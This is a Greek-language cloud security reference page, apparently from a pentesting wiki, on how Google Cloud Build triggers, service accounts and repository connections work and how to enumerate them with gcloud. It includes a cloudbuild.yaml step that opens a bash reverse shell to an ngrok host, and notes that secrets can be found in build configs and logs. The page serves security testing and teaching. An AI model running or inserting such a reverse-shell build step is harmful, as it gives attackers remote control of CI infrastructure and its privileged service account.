GCP - Cloud Build Enum

Basic Information

Google Cloud Build είναι μια διαχειριζόμενη πλατφόρμα CI/CD που αυτοματοποιεί τη διαδικασία κατασκευής και κυκλοφορίας λογισμικού, ενσωματώνοντας με αποθετήρια κώδικα και υποστηρίζοντας μια ευρεία γκάμα γλωσσών προγραμματισμού. Επιτρέπει στους προγραμματιστές να κατασκευάζουν, να δοκιμάζουν και να αναπτύσσουν κώδικα αυτόματα ενώ παρέχει ευελιξία για την προσαρμογή των βημάτων και των ροών εργασίας κατασκευής.

Κάθε Trigger Cloud Build είναι σχετικό με ένα Cloud Repository ή συνδεδεμένο απευθείας με ένα εξωτερικό αποθετήριο (Github, Bitbucket και Gitlab).

Events

Το Cloud Build μπορεί να ενεργοποιηθεί αν:

• Push σε ένα branch: Προσδιορίστε το branch

• Push ενός νέου tag: Προσδιορίστε το tag

• Pull request: Προσδιορίστε το branch που λαμβάνει το PR

• Χειροκίνητη κλήση

• Μήνυμα Pub/Sub: Προσδιορίστε το θέμα

• Webhook event: Θα εκθέσει ένα HTTPS URL και το αίτημα πρέπει να είναι αυθεντικοποιημένο με ένα μυστικό

Execution

Υπάρχουν 3 επιλογές:

• Ένα yaml/json που προσδιορίζει τις εντολές προς εκτέλεση. Συνήθως: /cloudbuild.yaml

• Μόνο μία που μπορεί να προσδιοριστεί “inline” στην web κονσόλα και στο cli

• Η πιο κοινή επιλογή

• Σχετική για μη αυθεντικοποιημένη πρόσβαση

• Ένα Dockerfile για κατασκευή

• Ένα Buildpack για κατασκευή

SA Permissions

Ο Λογαριασμός Υπηρεσίας έχει το πεδίο cloud-platform, επομένως μπορεί να χρησιμοποιήσει όλα τα προνόμια. Αν δεν προσδιοριστεί SA (όπως όταν γίνεται υποβολή) θα χρησιμοποιηθεί ο προεπιλεγμένος SA <proj-number>@cloudbuild.gserviceaccount.com.

Από προεπιλογή δεν δίνονται δικαιώματα αλλά είναι αρκετά εύκολο να του δοθούν μερικά:

Approvals

Είναι δυνατόν να ρυθμιστεί ένα Cloud Build να απαιτεί εγκρίσεις για τις εκτελέσεις κατασκευής (απενεργοποιημένο από προεπιλογή).

PR Approvals

Όταν το trigger είναι PR επειδή ο καθένας μπορεί να εκτελεί PRs σε δημόσια αποθετήρια θα ήταν πολύ επικίνδυνο να επιτρέπεται η εκτέλεση του trigger με οποιοδήποτε PR. Επομένως, από προεπιλογή, η εκτέλεση θα είναι αυτόματη μόνο για τους ιδιοκτήτες και τους συνεργάτες, και προκειμένου να εκτελεστεί το trigger με PR άλλων χρηστών, ένας ιδιοκτήτης ή συνεργάτης πρέπει να σχολιάσει /gcbrun.

Connections & Repositories

Οι συνδέσεις μπορούν να δημιουργηθούν μέσω:

• GitHub: Θα εμφανίσει ένα OAuth prompt ζητώντας άδειες για να αποκτήσει ένα Github token που θα αποθηκευτεί μέσα στον Secret Manager.

• GitHub Enterprise: Θα ζητήσει να εγκατασταθεί μια GithubApp. Ένα authentication token από τον host GitHub Enterprise σας θα δημιουργηθεί και θα αποθηκευτεί σε αυτό το έργο ως μυστικό του Secret Manager.

• GitLab / Enterprise: Πρέπει να παρέχετε το API access token και το Read API access token που θα αποθηκευτούν στον Secret Manager.

Αφού δημιουργηθεί μια σύνδεση, μπορείτε να τη χρησιμοποιήσετε για να συνδέσετε αποθετήρια στα οποία έχει πρόσβαση ο λογαριασμός Github.

Αυτή η επιλογή είναι διαθέσιμη μέσω του κουμπιού:

Connect a Repository

Αυτό δεν είναι το ίδιο με μια connection. Αυτό επιτρέπει διαφορετικούς τρόπους για να αποκτήσετε πρόσβαση σε ένα Github ή Bitbucket αποθετήριο αλλά δεν δημιουργεί ένα αντικείμενο σύνδεσης, αλλά δημιουργεί ένα αντικείμενο αποθετηρίου (1ης γενιάς).

Αυτή η επιλογή είναι διαθέσιμη μέσω του κουμπιού:

Storage

Μερικές φορές το Cloud Build θα δημιουργήσει μια νέα αποθήκευση για να αποθηκεύσει τα αρχεία για το trigger. Αυτό συμβαίνει για παράδειγμα στο παράδειγμα που προσφέρει το GCP με:

git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
cd cloud-console-sample-build && \
gcloud builds submit --config cloudbuild.yaml --region=global

Ένα Storage bucket με το όνομα security-devbox_cloudbuild δημιουργείται για να αποθηκεύσει ένα .tgz με τα αρχεία που θα χρησιμοποιηθούν.

Get shell

steps:
- name: bash
script: |
#!/usr/bin/env bash
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
options:
logging: CLOUD_LOGGING_ONLY

Εγκαταστήστε το gcloud μέσα στο cloud build:

# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
mkdir -p /usr/local/gcloud
tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
/usr/local/gcloud/google-cloud-sdk/install.sh

Enumeration

Μπορείτε να βρείτε ευαίσθητες πληροφορίες σε ρυθμίσεις κατασκευής και αρχεία καταγραφής.

# Get configured triggers configurations
gcloud builds triggers list # Check for the words github and bitbucket
gcloud builds triggers describe <trigger-name>

# Get build executions
gcloud builds list
gcloud builds describe <build-uuid> # Get even the build yaml if defined in there
gcloud builds log <build-uuid> # Get build logs

# List all connections of each region
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build connections in region: $region"
connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
if [[ ${#connections[@]} -eq 0 ]]; then
echo "No connections found in region $region."
else
for connection in $connections; do
echo "Describing connection $connection in region $region"
gcloud builds connections describe "$connection" --region="$region"
echo "-----------------------------------------"
done
fi
echo "========================================="
done

# List all worker-pools
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build worker-pools in region: $region"
gcloud builds worker-pools list --region="$region"
echo "-----------------------------------------"
done

Ανάβαση Δικαιωμάτων

Μη Αυθεντικοποιημένη Πρόσβαση

Μετά την Εκμετάλλευση